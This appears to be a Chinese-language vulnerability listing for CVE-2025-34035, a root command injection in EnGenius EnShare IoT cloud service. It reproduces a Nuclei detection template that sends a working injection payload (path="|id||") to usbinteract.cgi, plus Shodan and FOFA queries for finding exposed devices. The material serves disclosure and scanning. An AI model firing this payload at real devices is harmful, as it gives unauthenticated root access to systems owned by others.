CVE-2025-34035: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution

日期: 2025-08-01 | 影响软件: EnGenius EnShare IoT Gigabit Cloud Service | POC: 已公开

漏洞描述

An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier.The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands.The injected commands are executed with root privileges, leading to full system compromise.

PoC代码[已公开]

id: CVE-2025-34035

info:
  name: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
  author: intelligent-ears
  severity: critical
  description: |
    An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier.The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands.The injected commands are executed with root privileges, leading to full system compromise.
  impact: |
    Unauthenticated attackers can inject and execute arbitrary shell commands with root privileges through the path parameter in usbinteract.cgi, achieving complete system compromise.
  remediation: |
    Upgrade EnGenius EnShare Cloud Service to version 1.4.12 or later that properly sanitizes user input in CGI scripts.
  reference:
    - https://cxsecurity.com/issue/WLB-2017060050
    - https://www.exploit-db.com/exploits/42114
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34035
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 10.0
    cve-id: CVE-2025-34035
    epss-score: 0.07633
    epss-percentile: 0.91637
    cwe-id: CWE-78
  metadata:
    verified: true
    shodan-query: html:"/web/cgi-bin/usbinfo.cgi"
    fofa-query: body="/web/cgi-bin/usbinfo.cgi"
    max-request: 1
  tags: cve,cve2025,engenius,enshare,rce,vkev,vuln

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=7&path="|id||"

    payloads:
      path:
        - "/web/cgi-bin/usbinteract.cgi"
        - "/cgi-bin/usbinteract.cgi"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('uid=([0-9(a-z_)]+) gid=([0-9(a-z_)]+)', body)"
          - 'contains(body, "Content-type: text/html")'
          - "status_code == 200"
        condition: and
# digest: 490a00463044022018ed010da5ef1de057e282a157c31a2d4ece26f1d35393eaefc79c294d0de01102200c7aacd316bd413748949e7b04aedf972a2c01a5ff5f596a8fc075aa3205bdd2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-34035.yaml

相关漏洞推荐